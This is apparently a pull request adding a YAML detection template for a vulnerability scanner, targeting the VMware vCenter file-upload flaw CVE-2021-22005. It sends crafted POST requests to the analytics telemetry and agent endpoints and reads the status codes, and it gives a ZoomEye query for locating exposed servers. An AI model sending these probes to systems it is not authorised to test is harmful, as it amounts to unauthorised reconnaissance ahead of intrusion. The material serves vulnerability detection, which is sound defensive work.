### PR TITLE
VMware vCenter Server 文件上传漏洞（CVE-2021-22005）漏洞

### DIFF
--- a/pocs/vmware-cve-2021-022005.yml
+++ b/pocs/vmware-cve-2021-022005.yml
@@ -1,0 +1,54 @@
+name: poc-yaml-vmware-cve-2021-022005
+groups:
+  payload1:
+    - method: GET
+      path: /
+      expression: |
+        response.status == 200 && response.body.bcontains(b"VMware vCenter")
+    - method: POST
+      path: /analytics/telemetry/ph/api/hyper/send?_c&_i=test
+      headers:
+        Content-Type: application/json
+      body: |
+        lorem ipsum
+      expression: |
+        response.status == 201
+  payload2:
+    - method: GET
+      path: /
+      expression: |
+        response.status == 200 && response.body.bcontains(b"VMware vCenter")
+    - method: POST
+      path: /analytics/ph/api/dataapp/agent?_c=test&_i=1
+      headers:
+        Content-Type: application/json
+        Connection: keep-alive
+        accept: application/vapi
+        X-Deployment-Secret: abc
+        Accept-Encoding: gzip, deflate
+      body: |
+        {}
+      expression: |
+        response.status == 201
+  payload3:
+    - method: GET
+      path: /
+      expression: |
+        response.status == 200 && response.body.bcontains(b"VMware vCenter")
+    - method: POST
+      path: /analytics/ph/api/dataapp/agent?action=collect&_c=test&_i=1
+      headers:
+        Content-Type: application/json
+        Connection: keep-alive
+        accept: application/vapi
+        X-Deployment-Secret: abc
+        Accept-Encoding: gzip, deflate
+      body: |
+        {}
+      expression: |
+        response.status == 200
+detail:
+  author: tangshoupu
+  info: version < 7.0 U2c、version < 6.7 U3o  VMware vCenter Server 文件上传漏洞（CVE-2021-22005）漏洞
+  links:
+    - https://www.vmware.com


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
VMware vCenter Server 文件上传漏洞（CVE-2021-22005）漏洞检测poc
影响范围：
vCenter Server versions 6.7 and 7.0
Cloud Foundation (vCenter Server) 3.x, 4.x

## 测试环境

ZoomEye网空测绘平  app:"VMware_vCenter"


## 备注


